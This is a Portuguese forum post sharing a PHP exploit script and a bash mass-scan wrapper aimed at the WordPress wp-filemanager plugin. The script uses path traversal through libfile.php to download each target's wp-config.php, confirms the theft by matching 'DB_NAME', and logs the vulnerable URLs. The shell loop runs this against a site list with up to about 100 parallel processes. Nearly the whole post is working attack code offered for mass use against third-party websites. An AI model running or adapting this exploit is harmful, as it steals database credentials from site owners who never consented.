Tweet
Ola caros, postando este script simples que fiz em php para o fuzzing da vulnerabilidade de download arbitrário do arquivo de configuração do wordpress a partir da brecha no plugin
wp_filemanager que permite a ação do mesmo!
Video:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Code:
Mass scan:
Code:
[]'s
wp_filemanager que permite a ação do mesmo!
Video:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Code:
Código PHP:
<?php
/*
Wp-filemanager automatization
begin 2013 :D
A simple fuzzer to help in the wp-config.php download
using the bug of wp_filemanager.
The bug works when the {Allow Download} in the wp_filemanager its activacted
on wp-admin ;)
Video:
http://www.youtube.com/watch?v=69IopiZuRFw&feature=youtu.be
Poc:
http://www.exploit-db.com/exploits/25440/
Image:
http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt25500/screen-shot-2013-05-15-at-83506-am.png
--=--=--=--=--=--=
To mass scan
write a php called wp_filemanager.php to the php code of wp_filemanager fuzz
and a script to mass:
~$ sh mass sites.txt
CODE:
--begin--
echo "--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--"
echo "Wp file manager simple fuzzer by n4sss "
echo "Mass verification with shell script "
echo "--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--"
sleep 5
echo "Wait the Mass verification of wp_filemanager.php"
cat $1 | sort | uniq > try.txt
CONTOR=0
for i in `cat try.txt`
do
CONTOR=`ps aux | grep -c php`
while [ $CONTOR -ge 100 ];do
CONTOR=`ps aux | grep -c php`
echo "Sleeping"
sleep 5
done
if [ $CONTOR -le 150 ]; then
php wp_filemanager.php $i > /dev/null &
fi
done
echo "[+] Completed! Verify Wp_vuln.txt if 1 you have wp vulns!"
--end of script--
--=--=--=--=--=--=
To use:
sh mass.sh sitelist.txt
--=--=--=--=--=--=
by n4sss.
nstruct[noSpam]jabber[dot]org
Greetx Janissaries.org
*/
if(!@$argv[1])
{
print "--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--\n";
print "Wp file manager simple fuzzer by n4sss \n";
print "UsE: php filemanager.php http://site \n";
print "example: (lnx/win) \n";
print "php filemanager.php http://localhost/wp/ \n";
print "Default log => wp_vuln.txt \n";
print "To use mass scan do: \n";
print "sh mass.sh sitelist (linux) \n";
print "--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--\n";
exit(0);
}else
{
print "--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--\n";
print "Wp_file_manager simple fuzzer by n4sss \n";
print "Let's fuzzing tha b0x \n";
print "--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--\n";
$log = "wp_vuln.txt";
$site = "$argv[1]";
$site = trim($site);
if(preg_match("/http/", $site))
{
$site = $site;
}else{
$site = str_replace("www.", "http://", $site);
}
print "Verifyng the current url: $site\n";
print "[=] Is wp?\n";
if(is_wp($site)){print "[+] Valid wordpress path found, explointing!\n"; do_theTest($site, $log);}
else{print "[-] Sorry bro no wp-site found here\n"; exit("exit 0");}
}
function is_wp($url)
{
$path = $url."/wp-login.php";
$regex = "WordPress";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
$exec = curl_exec($ch);
if(preg_match("/$regex/i", $exec))
{
return TRUE;
}else
{
return FALSE;
}
}
function save_content($file, $content, $write)
{
$fp = @fopen($file, $write);
@fwrite($fp, $content."\n");
@fclose($fp);
print "$file writed with => \"$write\" mode and the url vuln\n";
}
function do_theTest($url, $log)
{
$regex = "'DB_NAME'";
$path = "/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url.$path);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$exec = curl_exec($ch);
if(preg_match("/$regex/i", $exec))
{print "[+]We can read the wp-config.php n4sss HaHaHaHAHAhahahHA!\n"; sleep(2); print "Saving to our log => $log\n";
save_content($log, "$url.$path", "a");
}else{exit("[-] Not vuln\n");}
}
?>
Code:
Código:
echo "--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--" echo "Wp file manager simple fuzzer by n4sss " echo "Mass verification with shell script " echo "--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--v--" sleep 5 echo "Wait the Mass verification of wp_filemanager.php" cat $1 | sort | uniq > try.txt CONTOR=0 for i in `cat try.txt` do CONTOR=`ps aux | grep -c php` while [ $CONTOR -ge 100 ];do CONTOR=`ps aux | grep -c php` echo "Sleeping" sleep 5 done if [ $CONTOR -le 150 ]; then php wp_filemanager.php $i > /dev/null & fi done echo "[+] Completed! Verify Wp_vuln.txt if 1 you have wp vulns!"
vlw . 
Comment